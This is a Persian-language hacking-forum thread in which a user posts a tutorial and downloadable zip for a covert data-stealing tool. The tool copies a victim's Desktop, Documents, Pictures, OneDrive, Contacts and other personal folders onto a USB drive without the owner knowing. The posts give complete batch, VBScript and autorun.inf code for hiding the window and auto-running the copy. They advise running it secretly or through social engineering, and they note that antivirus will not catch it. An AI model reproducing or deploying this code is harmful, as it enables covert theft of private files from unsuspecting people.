discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

سلام دوستان.

در این تاپیک می خواهم نحوه ساخت ویروسی برای کپی اطلاعات به صورت فیزیکی آن هم بدون اطلاع تارگت را قرار بدم. (شاید تو خیلی فیلم ها دیده باشید)

برای انجام تمیز و کامل شما نیاز به چهار فایل دارید(فقط یکی از فایل ها ضروری است و بقیه فایل ها برای به جا نگذاشتن رد است)

به علت خطرناک نبودن فایل ها برای سیستم، آنتی ویروس ها کاری به فایل های ما ندارند

ساخت فایل اصلی

برای ساخت ویروس می توانید از یک تکست ادیتور مثل Notepad استفاده کنید،   متن زیر را داخل یک فایل bat قرار دهید و نام آن را file.bat بگذارید (حتما فایل را با فرمت .bat ذخیره کنید.)

:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y /g
echo off
%backupcmd% "%USERPROFILE%\Desktop" "%drive%\Sajy1384\Desktop"
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Sajy1384\My pics"
%backupcmd% "%USERPROFILE%\Documents" "%drive%\Sajy1384\Documents"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Sajy1384\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Sajy1384\vids"
%backupcmd% "%USERPROFILE%\Download" "%drive%\Sajy1384\Download"
%backupcmd% "%USERPROFILE%\Music" "%drive%\Sajy1384\Music"
%backupcmd% "%USERPROFILE%\OneDrive" "%drive%\Sajy1384\OneDrive"
%backupcmd% "%USERPROFILE%\3D Objects" "%drive%\Sajy1384\3D Objects"
%backupcmd% "%USERPROFILE%\Contacts" "%drive%\Sajy1384\Contacts"
@echo off 

 

مخفی سازی هنگام اجرا

برای مخفی کردن فایل هنگام اجرا نیاز به دو فایل دارید.

 

فایل اول

دوباره Notepad را باز کنید و فایلی با عنوان invisible.vbs بسازید و متن زیرا داخل آن قرار دهید. (حتما فایل را با فرمت .vbs  -مخفف وی‌بی‌اسکریپت- ذخیره کنید)

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

 

فایل دوم

مجددا Notepad را باز کنید و یک فایل .bat دیگر بسازید و متن زیر را درونش قرار دهید. می توانید نام فایل را launcher.bat بگذارید.

wscript.exe "%drive%\invisible.vbs" "%drive%\file.bat"

 

نکته: یک فایل دیگر هم هست که فقط زمانی کاربرد که ویندوز تارگت شما 7 یا کمتر از 7 باشد.البته بهتر است این فایل هم کنار فایل هایتان داشته باشید چون اگر اجرا شود خیلی می تواند در روند کار به شما کمک کند. در غیر این صورت شما نیازمند این فایل نیستید و می توانید از آن صرف نظر کنید.

 

استفاده از Autorun

Notepad را باز کنید و فایلی با عنوان autorun.inf درست کنید و متن زیر را درونش قرار دهید.

[autorun]
open=launcher.bat

 

تمام فایل ها را درون هارد یا فلشتون منتقل کنید (ترجیحا از چیزی با حافظه ذخیره سازی بالا مثل هارد استفاده کنید تا مشکل کمبود فضا نداشته باشید)

 

اگر تارگت شما از ویندوز 7 به پایین استفاده می کند شما فقط باید هارد یا فلشتون را به سیستم متصل کنید.

اما اگر تارگت از ویندوز 8 ، 8.1 یا 10 استفاده می کرد باید خیلی سریع و به صورت مخفیانه فایل launcher.bat را اجرا کنید. (می توانید از مهندسی اجتماعی هم برای کار استفاده کنید)

 

اطلاعاتی که کپی می شود را می توانید به محض اجرای فایل در پوشه ای با نام Sajy1384 مشاهده کنید.

 

همه فایل ها را درون یک فایل زیپ پیوست کردم

پسورد : guardiran.org

 

امیدوارم که استفاده کافی را برده باشید. از اسپم کردن هم به شدت خودداری کنید.

💙کلید لایک زیر همین پست قرار داره 💙

Guardiran.zip

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 3 ساعت قبل، sajy1384 گفته است :

عملکرد فایل ها  (به صورت ویدیویی)

با کیفیت 720p ببینید تا متن ها قابل مشاهده باشد.

در صورت اجرا نشدن ویدیو از اینجا اقدام کنید

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام

شما فایل را در Downloads/guard---------------/Guardiran اجرا می کنید.

اگه به فایل launcher.bat را با notepad باز کنید می بینید که من قبل از  invisible.vbs\ و file.bat\ از %drive% استفاده کردم. یعنی فایل ها طوری طراحی شده که فقط روی یک حافظه ذخیره سازی خارجی (و در دایرکتوری اصلی) اجرا شود.

اگر می خواهید فایل ها را داخل پوشه ای، درون هارد یا فلشتون منتقل کنید باید فایل invisible.vbs را اینطور ویرایش کنید:

wscript.exe "%drive%\YourFolderName\invisible.vbs" "%drive%\YourFolderName\file.bat"

 

وگرنه فقط کافیه فقط همه فایل ها را درون هارد یا فلشتون(در دایرکتوری اصلی) منتقل کنید و بعد فایل launcher.bat را آنجا اجرا کنید.

اگر ویدیو را دیده باشید من فایل launcher.bat را روی هارد اجرا کردم، نه روی هارد سیستم.

 

موفق باشید.

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری